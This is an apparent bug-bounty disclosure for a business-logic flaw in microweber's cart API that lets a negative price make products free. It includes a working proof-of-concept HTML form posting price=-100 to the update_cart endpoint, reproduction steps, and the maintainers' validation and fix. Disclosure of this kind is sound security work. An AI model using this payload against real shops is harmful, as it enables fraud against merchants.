Business Logic Errors in microweber/microweber
Jul 20th 2021
microweber is vulnerable to Business Logic error through negative product price.
🕵️♂️ Proof of Concept
<form id="form" action="http://localhost/api/update_cart" method="POST" > <input type="text" name="for" value="content"> <input type="text" name="for_id" value="1"> <input type="text" name="price" value="-100"> <input type="submit"> </form>
- Save the above content into an HTML file.
- Access the app (localhost) and add a product to the cart.
- Open the HTML file and click on
submitbutton to take $100 off.
It is possible to get all products for free.
Peter Ivanov validated this vulnerability 2 years ago
Renan Rocha has been awarded the disclosure bounty
The fix bounty is now up for grabs
Peter Ivanov marked this as fixed with commit 76c277 2 years ago
This vulnerability will not receive a CVE
commented 2 years ago
hi, thanks for report,
this issue is happening only on products that does not have price set in the CMS
now its fixed
to join this conversation